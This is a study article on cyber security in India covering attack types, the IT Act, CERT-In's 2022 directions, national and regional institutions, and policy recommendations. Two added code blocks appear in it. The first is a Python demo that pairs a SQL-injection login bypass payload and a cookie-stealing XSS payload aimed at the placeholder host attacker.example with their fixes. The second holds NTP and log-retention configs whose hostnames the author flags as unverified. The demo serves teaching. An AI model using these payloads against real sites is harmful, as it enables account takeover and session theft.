CYBER SECURITY
Cyber security is the practice of defending computers, servers, mobile devices, electronic systems, networks, and data from malicious attacks. It is also known as information technology security or electronic information security. In India, the Information Technology Act, 2000 gives legal recognition to electronic records, electronic signatures and electronic commerce, and defines and penalises a range of cybercrimes.
Categories of Cyber Security
- Network security: It is the practice of securing a computer network from intruders, whether targeted attackers or opportunistic malware.
- Application security: It focuses on finding and fixing weaknesses in software and devices before attackers do. A compromised application can expose all of the data it is designed to protect.
- Information security: It protects the confidentiality, integrity and availability of data, both at rest and in transit.
- Operational security: It includes the processes and decisions for handling and protecting data assets, such as who may access which data and how it is stored and shared.
- Disaster recovery and business continuity: It defines how an organization responds to a cybersecurity incident or any other event that causes the loss of operations or data.
- End-user education: It addresses the most unpredictable cybersecurity factor: people. Teaching users to delete suspicious email attachments, not plug in unidentified USB drives, and other important lessons is vital for the security of any organization.
Types of Cyber Attacks
- Embedding malware (trojanised applications): Cyber criminals hide malware inside otherwise legitimate applications or updates; once installed, it can harvest stored passwords, sniff traffic on poorly secured Wi-Fi hotspots, and exfiltrate useful information.
- Phishing: It is a type of social engineering attack used to steal user data, including login credentials and credit card numbers. It occurs when an attacker, posing as a trusted entity, dupes a victim into opening an email, instant message, or text message and acting on it.
- For example: Authentication provider Okta confirmed in 2022 that the cyber-crime group Lapsus$ had gained access to the account of a third-party customer-support engineer earlier that year. Lapsus$ relies heavily on social engineering of employees and contractors; it has also breached major firms such as Microsoft and has publicly taunted its victims by leaking their source code and internal documents.
- Man-in-the-middle attacks: It is a general term used when a perpetrator positions themselves in a conversation between a user and an application, to eavesdrop or impersonate one of the parties, making it appear as if a normal exchange of information is underway.
- DDoS attack: A distributed denial-of-service attack uses many compromised internet-connected devices, collectively known as a botnet, to flood a target with traffic so that legitimate users can no longer reach it.
- Cross-site scripting (XSS): An injection attack in which malicious script is placed in an otherwise benign, trusted website, so that it runs in the browsers of other users with that site's privileges (for example, to steal session cookies or perform actions as the victim).
- SQL injection attack: An injection attack in which untrusted input is concatenated into a database query and is therefore interpreted as SQL. Attackers use SQL injection vulnerabilities to read or modify data and to bypass application security checks such as a login.
- Cyber espionage: It is a type of cyberattack in which an unauthorized user attempts to access sensitive or classified data or intellectual property for economic gain, competitive advantage, or political reasons.
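The two injection attacks listed above share one root cause: user input is mixed into code (a query or a page) that something else then interprets. The following is an added example, not code from the original page, that shows a login check that can be bypassed with a classic SQL injection payload, the parameterised query that closes it, and an HTML sink that reflects user text unescaped beside its escaped form. The user table, the credentials and the payloads are all constructed for the demo; it runs against an in-memory SQLite database and needs nothing beyond the Python standard library.

```python
"""
Added example (not from the original page): an SQL injection that bypasses a
login check, the parameterised query that prevents it, and an XSS sink beside
its output-encoded form. All data below is constructed for the demo.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample user table; plaintext passwords only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Untrusted input is pasted into the SQL text, so the input can rewrite the query's logic."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL and are never parsed as code."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


def render_comment_vulnerable(comment: str) -> str:
    """Reflects user text into HTML unchanged: a stored/reflected XSS sink."""
    return "<div class='comment'>" + comment + "</div>"


def render_comment_fixed(comment: str) -> str:
    """html.escape turns <, >, &, and quotes into entities, so the browser renders text, not markup."""
    return "<div class='comment'>" + html.escape(comment, quote=True) + "</div>"


# Classic payload: closes the string literal, makes the WHERE clause always true,
# and comments out the trailing quote with '--'.
SQLI_PAYLOAD = "' OR '1'='1' --"
# Hypothetical cookie-stealing script; attacker.example is a placeholder host.
XSS_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"


def demo() -> dict:
    """Runs both the vulnerable and the fixed paths and returns the outcomes."""
    conn = make_db()
    return {
        "vuln_bypassed": login_vulnerable(conn, "alice", SQLI_PAYLOAD),          # True
        "fixed_bypassed": login_fixed(conn, "alice", SQLI_PAYLOAD),              # False
        "fixed_legit": login_fixed(conn, "alice", "correct horse battery staple"),  # True
        "xss_raw": render_comment_vulnerable(XSS_PAYLOAD),
        "xss_escaped": render_comment_fixed(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The vulnerable login builds the string `... AND password = '' OR '1'='1' --'`, which SQLite evaluates as true for every row. The fix is not input filtering but keeping data and code apart: the driver binds the values, so the same payload is simply a password that matches nothing. The same principle applies to the HTML case, where encoding at the point of output is what stops the browser from treating user text as script.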
Need for Cyber Security
- For individuals
- Compromise with individual’s data:
- For example: Domino’s India data leak led to more than 18 crore orders’ data being put up on the dark web for sale; Air India data leak led to the compromise of more than 45 lakh users’ data.
- Inappropriate use of information: Photos, videos, and other personal information shared by an individual on social networking sites can be inappropriately used by others.
- Lack of awareness: A large share of cybercrime frauds (some estimates put it near 80%) succeed because victims lack basic cyber awareness. During the COVID-19 pandemic, heavy use of social media and the shift to online channels for earning and spending money led to a rise in cybercrimes.
- Accessibility: Amid the pandemic, sensitive information has become susceptible to security vulnerabilities as firms permitted employees to work from home.
- For businesses/organizations
- E-commerce boom: The Indian e-commerce market is expected to reach US$ 200 billion by 2026. This increases the vulnerability of consumers to online frauds (identity thefts, credit card frauds, etc.).
- 4th Industrial Revolution: This has led to the rise of the Internet of Things (IoT), artificial intelligence, and machine learning, which would see a more connected environment. This would require communication systems to be secure.
- Increasing importance of the digital economy: The digital economy today comprises 14-15% of India’s total economy and is targeted to reach 20% by 2024.
- Lack of private sector: Few Indian companies build cyber security products, leaving a significant capability gap in the domestic sector and a reliance on imported tools.
- For the nation
- Financial loss: India has lost a huge amount of money each year in cyberattacks. For instance, cybercrimes in India caused losses of ₹1.25 lakh crore in 2019.
- Regulatory mechanism: The IT Act, 2000, is not equipped to consider new-age changes in the mode of functioning of businesses and modus operandi of crimes in cyberspace.
- Anonymity: Law enforcement is handicapped by the fact that cybercriminals can operate from anywhere with internet access.
- Weak digital security: Outdated infrastructure, with poor or inadequate cyber security protection, has exposed India’s digital vulnerability.
- For example: Aadhaar data leakage.
- Cyber sabotage: Defined as deliberate and malicious acts that result in the disruption of the normal processes and functions or the destruction or damage of equipment or information.
- For example: The October 2020 power outage across Mumbai was attributed by the Maharashtra government to an intrusion into Maharashtra State Electricity Board (MSEB) systems; the Union Power Ministry attributed the outage to human error, and the attribution remains disputed.
- Sleeper cyberattacks: Sleeping malware is placed or sent to various critical systems and later remotely activated to control or cripple the infrastructure.
- System vulnerabilities: When cybercriminals spot a weakness, they pounce on it.
- For example: In 2020, attackers compromised the build process of software developer SolarWinds and inserted a backdoor into signed updates of its Orion platform. Customers, including US government agencies, installed the trojanised update as a routine patch, which is what made this supply-chain attack so hard to detect.
- Spearphishing: Targeted emails crafted to appear to come from a trusted source, designed to get specific recipients to reveal sensitive information or to install malware on their systems.
- For example: ModifiedElephant operators used spearphishing emails to plant incriminating evidence on the personal devices of Indian journalists, human rights activists, and lawyers.
- Other Reasons for Cyber Security
- Multiple Organizations: India has 36 different central bodies that deal with cyber issues, leading to overlapping responsibilities. Lack of coordination further exacerbates the issue.
- Lack of Resources: India suffers from a lack of manpower, training, and indigenization in hardware and software cyber security tools, pushing it to a more vulnerable position.
- For example: Unlike Israel’s National Cyber Directorate or the US Cybersecurity and Infrastructure Security Agency (CISA), India has no single dedicated agency with a comparable mandate for national cyber defence.
- Critical Infrastructure: Critical infrastructure, such as power systems, transportation systems, and refineries, is vulnerable to data theft and cyberattacks, which could potentially bring the entire economy to a standstill.
- Government Schemes: Government initiatives such as Digital India, Aadhaar, MyGov, e-Market, DigiLocker, and Bharat Net require enhanced protection against cyberattacks.
- 5th Arena of War: Cyberspace has emerged as the fifth domain of warfare (after land, sea, air, and space). It is imperative to protect the nation from cyber threats.
- Increasing Threat of Anti-National Activities: Cyberspace has allowed terrorist groups to remain anonymous and propagate nefarious activities, such as anti-state propaganda and radicalizing the public.
- Possibility of ‘Fire-Sale’ Assault: This refers to a coordinated attack on connected infrastructure such as transportation, telecommunication, financial, and utility systems. Such attacks could cripple the economy and cause significant human casualties.
Challenges
- Governance-Related Challenges
- Lack of Awareness and Transparency: The culture of cybersecurity awareness is lacking at both individual and institutional levels. Many agencies are reluctant to declare cybersecurity attacks on their infrastructure.
- Lack of Coordination: There are multiple cybersecurity agencies in India, but coordination between them is ineffective. The separation between military and civilian cybersecurity infrastructures further complicates response mechanisms.
- For example: Some state governments have set up their own CERTs (Computer Emergency Response Teams) alongside the national CERT-In.
- Lack of National-Level Architecture: India lacks a national cybersecurity architecture that can unify efforts among various agencies to assess and tackle cyber threats effectively.
- Lack of Separation: In cyberspace, there are no boundaries. This makes institutions and organizations vulnerable to attacks from anywhere, leading to significant losses in money, property, and even lives.
- Foreign Dependency: India lacks indigenization in hardware as well as software cyber security tools, increasing susceptibility to cybercrimes.
- Digital Infrastructure: In India, most people use cheaper smartphones with poor cyber security and privacy features, making them prone to cyber-attacks.
- For example: States like Punjab, Rajasthan, Goa, and Assam do not have a single cybercrime cell, while in Andhra Pradesh, Karnataka, and Uttar Pradesh, only one or two cybercrime cells have been set up.
- Data Storage: India is a net information exporter. Its information highways point west, carrying with them the data of millions of Indians.
- Lack of Uniformity in Devices: There is a widening gap between security features offered by high-end phones and lower-cost mobiles, making it almost impossible for legal and technical standards to be set for data protection by regulators.
- Human Resource-Related Issues:
- Shortage of Manpower: India faces a 9% higher shortage of skilled cyber security professionals compared to the global average. The country needs approximately 1 million cybersecurity professionals (Data Security Council of India).
- Unskilled Manpower: A majority of cybersecurity applicants are not well qualified, and only a few HR teams understand their cybersecurity hiring needs.
- Other Issues: Poor financial incentives, limited growth opportunities, and promotion challenges.
- Other Challenges:
- Lack of Awareness: There is no national regulatory policy for cybersecurity, resulting in a lack of awareness at both the company and individual levels.
- Growing Chinese Influence: Chinese influence in the Indian telecom space poses additional risks.
- Lack of Data Protection Law: The absence of a robust data protection law leaves data unprotected and increases vulnerabilities.
Initiatives for Cyber Security – National Level
- Legislative Measures
- Information Technology Act, 2000: Regulates the use of computer systems, networks, and their data. It provides statutory recognition to contracts and electronic authentication, digital signatures, and cybersecurity-related liabilities.
- Cooperative Federalism: Police and Public Order are State subjects under the Constitution of India. States/UTs are primarily responsible for preventing, detecting, investigating, and prosecuting cybercrimes through their law enforcement mechanisms.
- New Cybersecurity Guidelines: In April 2022, CERT-In issued directions under Section 70B of the IT Act, 2000 to enhance information security practices and make incident reporting mandatory:
- Reporting: Service providers, intermediaries, data centres, body corporates and government organisations must report cyber incidents to CERT-In within six hours of noticing them.
- Log Enabling: The same entities must enable and securely maintain logs of all their ICT systems for a rolling period of 180 days, and keep those logs within Indian jurisdiction.
- Registration: Data centres, virtual private server (VPS) providers, cloud service providers and VPN service providers must register validated subscriber names and related details and retain them for five years or longer after the service ends.
- Action Taken Report: When CERT-In asks for it, service providers must report the actions taken on an incident.
- Network Time Protocol: Service providers must synchronise the clocks of all their ICT systems to the NTP servers of the National Informatics Centre (NIC) or the National Physical Laboratory (NPL), so that timestamps across logs from different organisations can be correlated during an investigation.
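As an added illustration of the log-retention and time-synchronisation directions above (these fragments are not part of the original page), the following shows a chrony configuration that keeps a Linux server's clock on NIC's NTP servers, followed by a logrotate policy that keeps 180 daily log files. The hostnames samay1.nic.in and samay2.nic.in are the ones I recall from the text of the CERT-In directions and should be verified against the current directions before use; the log path /var/log/myapp/ is a hypothetical application directory. The requirement that logs stay within Indian jurisdiction is a matter of where the host and any log-forwarding destination are located, which a config file cannot express.

```conf
# /etc/chrony/chrony.conf   (Debian/Ubuntu path; RHEL-family systems use /etc/chrony.conf)
# Keep system time on NIC's NTP servers as the CERT-In directions require.
# Hostnames are an assumption recalled from the directions; verify before deploying.
server samay1.nic.in iburst
server samay2.nic.in iburst
# Step the clock during the first 3 updates if it is off by more than 1 s, so a
# freshly built host with a wrong clock does not write mis-timestamped logs for hours.
makestep 1.0 3
# Write the system time to the hardware clock so it survives a reboot.
rtcsync
# Record tracking and measurement data: evidence that the clock was in sync at incident time.
logdir /var/log/chrony
log tracking measurements

# /etc/logrotate.d/myapp   (hypothetical application; path is an assumption)
# Rotate daily and keep 180 rotations, matching the 180-day retention period.
/var/log/myapp/*.log {
    daily
    rotate 180
    compress
    delaycompress
    missingok
    notifempty
    dateext
    create 0640 myapp adm
}
```

After restarting chrony, `chronyc tracking` reports the selected server and the current offset; an `Leap status : Normal` line with a sub-second offset is what you want to see. For the logrotate fragment, `rotate 180` with `daily` is what actually produces 180 days of history; `dateext` names each file by date so a retention audit can be done by listing the directory.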
- Policies
- National Cyber Security Policy, 2013: Outlines a roadmap to create a framework for comprehensive, collaborative, and collective responses to deal with cyber security issues at all levels within the country.
- National Cyber Security Strategy, 2020: Prepared by the National Security Council Secretariat to ensure a safe, secure, trusted, resilient, and vibrant cyberspace for the nation.
- Pillars of Strategy:
- Secure: Strengthening the National Cyberspace.
- Strengthen: Enhancing Structures, People, Processes, and Capabilities.
- Synergize: Efficient utilization of resources, including cooperation and collaboration.
- Institutional Measures
- National Critical Information Infrastructure Protection Centre (NCIIPC): The Government established NCIIPC as the nodal agency to protect critical information infrastructure in the country.
- National Cybersecurity Coordination Centre (NCCC): India’s cyberspace intelligence agency tasked with screening communications metadata to detect real-time cyber threats. It closely coordinates with law enforcement agencies for intelligence gathering.
- Indian Computer Emergency Response Team (CERT-In): Designated as the national nodal agency for responding to cyber incidents under Section 70B of the IT Act (inserted by the IT Amendment Act, 2008); it issues advisories, coordinates incident response and collects incident reports.
- Indian Cyber-Crime Coordination Centre (I4C) and Cyber Warrior Police Force: Established under the Cyber and Information Security Division to address internet crimes, including cyber threats, child pornography, and online stalking.
- National Cyber Crime Reporting Portal: Caters specifically to complaints of cybercrimes, focusing on cases involving women and children.
- Defence Cyber Agency: A tri-service agency of the Indian Armed Forces tasked with managing military cyber security threats, particularly from state-backed actors in China and Pakistan.
- Other Initiatives
- National Cyber Security Incident Response Exercise (NCX India): Trains senior management and technical personnel from government and critical sector organizations to handle contemporary cyber threats and incidents. Conducted by the National Security Council Secretariat (NSCS).
- Cyber Swachhta Kendra (Botnet Cleaning and Malware Analysis Centre): Launched to detect malicious programs and provide free tools to remove them.
- Common Criteria Recognition Arrangement (CCRA): India is recognized as a Certificate Issuing Nation for cyber security under the CCRA framework.
- Digital Army Programme: Dedicated to digitizing and automating processes, procedures, and services for the Indian Army as part of the Digital India initiative.
- TechSagar Platform: An online portal offering actionable insights into India’s industrial, academic, and research capabilities across technology areas such as artificial intelligence, cybersecurity, etc.
- Training of Information Security Personnel: Conducted through 52 institutions under the Information Security Education and Awareness Project. Aims to raise awareness and provide training and research in the field of information security.
Initiatives for Cyber Security – International Level
- Paris Call: A statement of consensus to address global concerns about cyber threats. It focuses on common principles agreed upon by like-minded countries, private sector entities, and civil society organizations.
- Budapest Convention: A multilateral treaty addressing cyber security by harmonizing national laws, enhancing investigative authorities, and promoting international cooperation. However, India has not signed this treaty.
- Ground Zero Summit: It is the largest collaborative platform in Asia for cyber security experts and researchers to address emerging cyber security challenges and demonstrate cutting-edge technologies.
- Internet Corporation for Assigned Names and Numbers (ICANN): A non-profit public benefit corporation that coordinates the Domain Name System (DNS) root, IP address allocation, and autonomous system numbers.
- Cooperation with Other Countries: India is collaborating with the UK, USA, China, Malaysia, Singapore, Japan, and others on issues like joint training of cybersecurity professionals, information exchange, law enforcement, and technical capacity building to combat cybercriminal activity.
Initiatives for Cyber Security – Regional Level
- Colombo Security Conclave (CSC): Renamed version of the National Security Advisor (NSA) Level Trilateral on Maritime Security (2011) with India, Sri Lanka, and Maldives as members. Bangladesh, Mauritius, and Seychelles participate as observer states, and the Secretariat is based in Colombo.
- Pacific Cyber Security Operational Network (PaCSON): A platform for sharing cybersecurity threat information and tools between member states.
- Singapore-ASEAN Cybersecurity Centre of Excellence (ASCCE): Aims to foster a common understanding of cybersecurity through technical capacity building.
- YAKSHA: An EU-ASEAN partnership to develop cybersecurity solutions tailored to specific national needs, leveraging EU expertise and local knowledge.
- ASEAN-Japan Cybersecurity Capacity Building Center (Bangkok): Meant to address obstacles to ASEAN cohesion on cyber-related issues.
- Skill Development in Cybersecurity: Microsoft has introduced a cybersecurity skill development campaign across 23 geographies, including India, to address the alarming shortage of internet security professionals.
Need for Initiatives for Cyber Security – Regional Level in South Asia
- Infrastructural Challenges
- Digital Economy: The region’s digital economy is projected to grow rapidly, making South Asian nations more vulnerable to cyberattacks, resulting in data breaches or system failures.
- For example: Organizations in Asia are 80% more likely to be targeted by hackers.
- Knowledge Gap: There is a lack of practical guidance, security baselines, and frameworks relating to good practices in cybersecurity.
- Lacking Capabilities and Infrastructure: Many South Asian countries lack strategic mindsets, policy preparedness, and institutional oversight for cybersecurity. There is also a shortage of cybersecurity professionals, with staff retention remaining an issue.
- Coordination Challenges
- Lack of Global Consensus: The absence of a breakthrough in the implementation of global cyber norms highlights the need for regional cooperation.
- Lack of Regional Coordination: South Asian nations often limit the sharing of threat intelligence due to mistrust and a lack of transparency. The absence of a unifying framework leads to significant underinvestment in cybersecurity.
- Security Challenges
- Rapid Technological Advancement: This makes threat monitoring and response more difficult, especially with more powerful encryption, cloud computing, and the widespread growth of the Internet of Things (IoT).
- Weaponization of Social Media: Continually evolving cyber-attacks use disinformation, concealment, and deception to create strategic uncertainty and increase the potential for cyber warfare.
- Potential Use by States: A number of states are developing ICT capabilities for military purposes. The use of ICTs in future conflicts among states is becoming increasingly likely.
Way Forward
- Policy Measures
- Integrated Cyber Security Command: At present, India follows a sector-specific policy for cyber security, which hampers coordinated efforts. There is a need for an integrated cyber security command.
- Establish National Cyber Security Commission (NCSC): This commission would coordinate with all ministries to manage National Critical Information Infrastructure (NCII) in their respective areas and play a catalytic role in fulfilling the military’s requirements in cyber warfare.
- Upgrade Cyber Cells: Existing cyber cells require upgrades, such as setting up dark web monitoring cells and social media monitoring cells, while inducting technical experts along with traditional police recruitment.
- Strengthening Existing Cyber Security Framework: National cybersecurity projects like the NCCC, NCIIPC, and CERT need to be strengthened manifold and periodically reviewed.
- Cyber-Resilience: This refers to a three-pronged process:
- Proactively prepare for disruptions.
- Respond to them effectively.
- Recover swiftly.
- Dedicated Cadre of Officers for Cyberspace: Consider creating a specialized cadre, such as a Digital Armed Force, dedicated to cyberspace operations.
- Never Trust, Always Verify Approach: Transition from the “trust but verify” model to the “never trust, always verify” security model to enhance cyber-resilience.
- Multi-Agency Organization: Establish a well-equipped multi-agency organization to address possible threats against the country’s critical resources.
- Integrated Approach: Given the increasing dominance of mobile and telecommunication, the National Cyber Security Policy and the National Telecom Policy must coalesce to create a comprehensive policy for 2030.
- Implementing Gulshan Rai Committee Recommendations
- Reducing Dependence on Foreign Servers: Create a dedicated secure gateway for all government communication.
- Cyber Forensic Labs: Set up cyber forensic laboratories in all states to investigate and respond to cyber incidents effectively.
- Awareness Generation: Sensitize people and institutions to the importance of reporting cyberattacks promptly to enable timely action.
- Other Measures
- Strengthen Resources (R&D): Invest in research and development to build offensive cyber capabilities and bolster national cyber defense.
- Offensive Capacity: Focus on enhancing offensive cyber capabilities rather than relying solely on defensive measures.
- Coordination: Increase inter-ministerial and inter-state coordination on cyber security to address shared challenges.
- Map Hotspot Areas: Identify and monitor cybercrime hotspots to prevent future attacks.
- Proper Investigations: Develop and upgrade cyber forensic capabilities to handle emerging cybercrimes effectively, particularly in the domains of big data, Internet of Things (IoT), and mobility.
- Measures to Improve Cyber Security at Regional Level
- Cyber Security in Education: Educational institutions, including central universities, private universities, industry associations, and Industrial Training Institutes (ITIs), should incorporate courses on cybersecurity.
- Promoting Indigenization: There is a need to create opportunities for developing software to safeguard cyber security and digital communications.
- AI and Machine Learning to Boost Cyber Defenses: As artificial intelligence and machine learning gather pace and influence more industries, they will play a larger role in cybersecurity.
- 4D Principle for Cyber Security: India requires a strong cybersecurity framework based on the “4D principles”: Deter, Detect, Destroy, and Document, to thwart any cyber challenges.
- Coordination Initiatives: Cyber norm implementation should prioritize regional organizations through a multi-stakeholder approach involving non-state actors, such as civil society organizations.
- Capacity Building: Enhance cooperation with organizations like the Global Forum on Cyber Expertise (GFCE) to protect critical infrastructure, share information, and reduce conflict risks.
- Awareness Generation: Launch awareness campaigns and develop guidelines or educational programs to educate mainstream users on basic cybersecurity hygiene.
- Dynamic Management of Cybersecurity: Relevant actors should adopt and implement dynamic management of cybersecurity, including:
- Vulnerability management.
- Bug bounty programs.
- Vulnerability handling processes.
- Harmonizing Behavior in Public and Private Sectors: Ensure harmonization across national regulatory and industry approaches while creating incentives for security-focused behavior in both the public and private sectors.
Best Practices
- United States Cyber Command: The USA has a separate cyber command center tasked with countering adverse cyber activities. It is one of the 11 unified commands under the US Department of Defense.
- Cyberdome, Kerala: A Center of Excellence for Kerala Police, designed to address long-term security challenges in cyberspace. It bridges the gap between emerging innovations and the skills needed by Kerala Police to combat cyber threats.
- Cyber Safe Women, Maharashtra: An initiative conducting awareness camps across all districts in Maharashtra to educate women on cyber safety.